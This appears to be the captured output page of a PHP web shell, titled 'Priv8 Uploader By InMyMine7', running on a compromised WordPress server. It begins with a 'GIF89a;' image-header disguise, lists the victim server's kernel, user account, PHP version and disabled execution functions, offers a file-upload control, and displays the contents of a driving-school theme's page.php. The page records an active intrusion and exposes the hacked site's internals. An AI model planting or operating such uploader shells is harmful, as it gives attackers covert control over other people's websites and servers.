GIF89a;

Priv8 Uploader By InMyMine7

Linux h2 5.10.0-38-amd64 #1 SMP Debian 5.10.249-1 (2026-02-10) x86_64
HEX
HEX
Server: Apache
System: Linux h2 5.10.0-38-amd64 #1 SMP Debian 5.10.249-1 (2026-02-10) x86_64
User: web78 (5067)
PHP: 8.3.30
Disabled: exec,shell_exec,system,passthru,popen,proc_open,pcntl_exec
Upload Files
File: /var/www/clients/client41/web78/web/wp-content/themes/chalak-driving-school/page.php
<?php
/**
 * The template for displaying all pages
 * 
 * @subpackage chalak-driving-school
 * @since 1.0
 * @version 0.1
 */

get_header(); ?>

<?php do_action( 'chalak_driving_school_above_header_page' ); ?>

<div class="container">
	<div id="primary" class="content-area">
		<main id="content" class="site-main" role="main">

			<?php
			while ( have_posts() ) : the_post();

				get_template_part( 'template-parts/page/content', 'page' );

				if ( comments_open() || get_comments_number() ) :
					comments_template();
				endif;

			endwhile; // End of the loop.
			?>

		</main>
	</div>
</div>

<?php do_action( 'chalak_driving_school_above_footer_page' ); ?>

<?php get_footer();